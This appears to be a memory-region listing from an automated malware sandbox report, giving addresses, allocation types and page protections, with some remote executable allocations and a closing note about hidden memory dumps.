6B42000
|
heap
|
page read and write
|
||
|
29B7000
|
trusted library allocation
|
page execute and read and write
|
||
|
1D95B200000
|
trusted library allocation
|
page read and write
|
||
|
24A70000
|
trusted library allocation
|
page read and write
|
||
|
3010000
|
trusted library allocation
|
page read and write
|
||
|
7920000
|
trusted library allocation
|
page read and write
|
||
|
24A50000
|
trusted library allocation
|
page read and write
|
||
|
24A60000
|
trusted library allocation
|
page read and write
|
||
|
706D000
|
stack
|
page read and write
|
||
|
7FFD9BA60000
|
trusted library allocation
|
page read and write
|
||
|
A632C7E000
|
stack
|
page read and write
|
||
|
24A60000
|
trusted library allocation
|
page read and write
|
||
|
8960000
|
direct allocation
|
page read and write
|
||
|
25340000
|
trusted library allocation
|
page read and write
|
||
|
22190000
|
remote allocation
|
page read and write
|
||
|
253B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1D9594C5000
|
heap
|
page read and write
|
||
|
1D95B5F6000
|
trusted library allocation
|
page read and write
|
||
|
7750000
|
trusted library allocation
|
page read and write
|
||
|
24A90000
|
trusted library allocation
|
page read and write
|
||
|
1D959B22000
|
trusted library allocation
|
page read and write
|
||
|
24A70000
|
trusted library allocation
|
page read and write
|
||
|
69B0000
|
direct allocation
|
page read and write
|
||
|
244F0000
|
heap
|
page read and write
|
||
|
88BD000
|
stack
|
page read and write
|
||
|
856C000
|
heap
|
page read and write
|
||
|
1D9698E9000
|
trusted library allocation
|
page read and write
|
||
|
244BB000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BB10000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B79B000
|
trusted library allocation
|
page read and write
|
||
|
21F7F000
|
stack
|
page read and write
|
||
|
7FFD9B93A000
|
trusted library allocation
|
page read and write
|
||
|
722C000
|
stack
|
page read and write
|
||
|
25130000
|
trusted library allocation
|
page execute and read and write
|
||
|
2244D000
|
trusted library allocation
|
page read and write
|
||
|
22250000
|
heap
|
page read and write
|
||
|
21764EF8000
|
heap
|
page read and write
|
||
|
244DD000
|
trusted library allocation
|
page read and write
|
||
|
30E0000
|
trusted library allocation
|
page read and write
|
||
|
2970000
|
trusted library allocation
|
page read and write
|
||
|
30C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
21FED000
|
stack
|
page read and write
|
||
|
7FFD9BB00000
|
trusted library allocation
|
page read and write
|
||
|
1D971A60000
|
heap
|
page execute and read and write
|
||
|
24A80000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BAA0000
|
trusted library allocation
|
page read and write
|
||
|
24A70000
|
trusted library allocation
|
page read and write
|
||
|
6B28000
|
heap
|
page read and write
|
||
|
24A70000
|
trusted library allocation
|
page read and write
|
||
|
6F9E000
|
stack
|
page read and write
|
||
|
244D1000
|
trusted library allocation
|
page read and write
|
||
|
E4408FF000
|
stack
|
page read and write
|
||
|
8570000
|
heap
|
page read and write
|
||
|
6B14000
|
heap
|
page read and write
|
||
|
24A70000
|
trusted library allocation
|
page read and write
|
||
|
25360000
|
trusted library allocation
|
page read and write
|
||
|
2231E000
|
stack
|
page read and write
|
||
|
24A40000
|
trusted library allocation
|
page read and write
|
||
|
21764D2F000
|
heap
|
page read and write
|
||
|
D1E496D000
|
stack
|
page read and write
|
||
|
7FFD9B7A0000
|
trusted library allocation
|
page read and write
|
||
|
A6336CE000
|
stack
|
page read and write
|
||
|
24A60000
|
trusted library allocation
|
page read and write
|
||
|
24A60000
|
trusted library allocation
|
page read and write
|
||
|
8510000
|
heap
|
page read and write
|
||
|
21EF0000
|
trusted library allocation
|
page read and write
|
||
|
25340000
|
trusted library allocation
|
page read and write
|
||
|
3060000
|
trusted library allocation
|
page read and write
|
||
|
28AF000
|
unkown
|
page read and write
|
||
|
7730000
|
trusted library allocation
|
page read and write
|
||
|
2F4E000
|
stack
|
page read and write
|
||
|
9F67000
|
direct allocation
|
page execute and read and write
|
||
|
24567000
|
heap
|
page read and write
|
||
|
24A70000
|
trusted library allocation
|
page read and write
|
||
|
6B21000
|
heap
|
page read and write
|
||
|
21E6E000
|
stack
|
page read and write
|
||
|
859A000
|
heap
|
page read and write
|
||
|
21764CEF000
|
heap
|
page read and write
|
||
|
1D959B38000
|
trusted library allocation
|
page read and write
|
||
|
4C10000
|
heap
|
page execute and read and write
|
||
|
8500000
|
heap
|
page read and write
|
||
|
D30000
|
heap
|
page read and write
|
||
|
1D95B35E000
|
trusted library allocation
|
page read and write
|
||
|
8521000
|
heap
|
page read and write
|
||
|
69A0000
|
heap
|
page read and write
|
||
|
CB8000
|
stack
|
page read and write
|
||
|
24A60000
|
trusted library allocation
|
page read and write
|
||
|
24A70000
|
trusted library allocation
|
page read and write
|
||
|
24A70000
|
trusted library allocation
|
page read and write
|
||
|
21764CD2000
|
heap
|
page read and write
|
||
|
21764D5A000
|
heap
|
page read and write
|
||
|
2248E000
|
trusted library allocation
|
page read and write
|
||
|
76DB000
|
heap
|
page read and write
|
||
|
69E0000
|
direct allocation
|
page read and write
|
||
|
25340000
|
trusted library allocation
|
page read and write
|
||
|
A63239E000
|
stack
|
page read and write
|
||
|
24A70000
|
trusted library allocation
|
page read and write
|
||
|
2498F000
|
stack
|
page read and write
|
||
|
8930000
|
trusted library allocation
|
page read and write
|
||
|
24A40000
|
trusted library allocation
|
page read and write
|
||
|
6B2B000
|
heap
|
page read and write
|
||
|
5E27000
|
remote allocation
|
page execute and read and write
|
||
|
25350000
|
trusted library allocation
|
page read and write
|
||
|
6B42000
|
heap
|
page read and write
|
||
|
E4405FE000
|
stack
|
page read and write
|
||
|
24A70000
|
trusted library allocation
|
page read and write
|
||
|
21764CF8000
|
heap
|
page read and write
|
||
|
1D9593A0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B9D0000
|
trusted library allocation
|
page read and write
|
||
|
1D957B00000
|
heap
|
page read and write
|
||
|
24A67000
|
trusted library allocation
|
page read and write
|
||
|
89E0000
|
direct allocation
|
page read and write
|
||
|
25360000
|
trusted library allocation
|
page read and write
|
||
|
78D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
21764CF4000
|
heap
|
page read and write
|
||
|
9567000
|
direct allocation
|
page execute and read and write
|
||
|
1D959B6F000
|
trusted library allocation
|
page read and write
|
||
|
25390000
|
trusted library allocation
|
page read and write
|
||
|
25350000
|
trusted library allocation
|
page read and write
|
||
|
6980000
|
direct allocation
|
page read and write
|
||
|
29BB000
|
trusted library allocation
|
page execute and read and write
|
||
|
246AC000
|
stack
|
page read and write
|
||
|
24520000
|
heap
|
page read and write
|
||
|
1D957B8E000
|
heap
|
page read and write
|
||
|
24A60000
|
trusted library allocation
|
page read and write
|
||
|
A63384A000
|
stack
|
page read and write
|
||
|
27BAC250000
|
heap
|
page read and write
|
||
|
7FFD9BAE0000
|
trusted library allocation
|
page read and write
|
||
|
1DD000
|
stack
|
page read and write
|
||
|
4B00000
|
heap
|
page read and write
|
||
|
24408000
|
trusted library allocation
|
page read and write
|
||
|
24A70000
|
trusted library allocation
|
page read and write
|
||
|
24A60000
|
trusted library allocation
|
page read and write
|
||
|
4C00000
|
heap
|
page execute and read and write
|
||
|
6B89000
|
heap
|
page read and write
|
||
|
24A60000
|
trusted library allocation
|
page read and write
|
||
|
24AA0000
|
trusted library allocation
|
page read and write
|
||
|
25360000
|
trusted library allocation
|
page read and write
|
||
|
7706000
|
heap
|
page read and write
|
||
|
7FFD9B784000
|
trusted library allocation
|
page read and write
|
||
|
24A60000
|
trusted library allocation
|
page read and write
|
||
|
21F3E000
|
stack
|
page read and write
|
||
|
24A70000
|
trusted library allocation
|
page read and write
|
||
|
68F0000
|
heap
|
page read and write
|
||
|
24A70000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BAB0000
|
trusted library allocation
|
page read and write
|
||
|
6970000
|
direct allocation
|
page read and write
|
||
|
83A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
49D8000
|
trusted library allocation
|
page read and write
|
||
|
21764EFD000
|
heap
|
page read and write
|
||
|
6960000
|
heap
|
page readonly
|
||
|
7FFD9B790000
|
trusted library allocation
|
page read and write
|
||
|
1D959B3C000
|
trusted library allocation
|
page read and write
|
||
|
21764D51000
|
heap
|
page read and write
|
||
|
24A70000
|
trusted library allocation
|
page read and write
|
||
|
3045000
|
trusted library allocation
|
page execute and read and write
|
||
|
8558000
|
heap
|
page read and write
|
||
|
245AD000
|
heap
|
page read and write
|
||
|
30FD000
|
heap
|
page read and write
|
||
|
1D95A16C000
|
trusted library allocation
|
page read and write
|
||
|
2984000
|
trusted library allocation
|
page read and write
|
||
|
A6328F8000
|
stack
|
page read and write
|
||
|
2239C000
|
stack
|
page read and write
|
||
|
7FFD9B9B0000
|
trusted library allocation
|
page read and write
|
||
|
24A80000
|
trusted library allocation
|
page read and write
|
||
|
1D95B5FE000
|
trusted library allocation
|
page read and write
|
||
|
6B35000
|
heap
|
page read and write
|
||
|
21764D22000
|
heap
|
page read and write
|
||
|
27BAC420000
|
heap
|
page read and write
|
||
|
244B4000
|
trusted library allocation
|
page read and write
|
||
|
21DEE000
|
stack
|
page read and write
|
||
|
1D95AB7A000
|
trusted library allocation
|
page read and write
|
||
|
245AD000
|
heap
|
page read and write
|
||
|
24A70000
|
trusted library allocation
|
page read and write
|
||
|
21764C10000
|
heap
|
page read and write
|
||
|
1D957A60000
|
heap
|
page read and write
|
||
|
245AD000
|
heap
|
page read and write
|
||
|
A6338CB000
|
stack
|
page read and write
|
||
|
30D0000
|
heap
|
page read and write
|
||
|
24A61000
|
trusted library allocation
|
page read and write
|
||
|
24A60000
|
trusted library allocation
|
page read and write
|
||
|
24A70000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B931000
|
trusted library allocation
|
page read and write
|
||
|
1D95B805000
|
trusted library allocation
|
page read and write
|
||
|
2B4F000
|
stack
|
page read and write
|
||
|
29AA000
|
trusted library allocation
|
page execute and read and write
|
||
|
24AA0000
|
trusted library allocation
|
page read and write
|
||
|
6915000
|
heap
|
page read and write
|
||
|
7990000
|
trusted library allocation
|
page read and write
|
||
|
24A60000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B962000
|
trusted library allocation
|
page read and write
|
||
|
299D000
|
trusted library allocation
|
page execute and read and write
|
||
|
25340000
|
trusted library allocation
|
page read and write
|
||
|
2457B000
|
heap
|
page read and write
|
||
|
22190000
|
remote allocation
|
page read and write
|
||
|
76B0000
|
heap
|
page read and write
|
||
|
1D959B52000
|
trusted library allocation
|
page read and write
|
There are 771 hidden memdumps, click here to show them.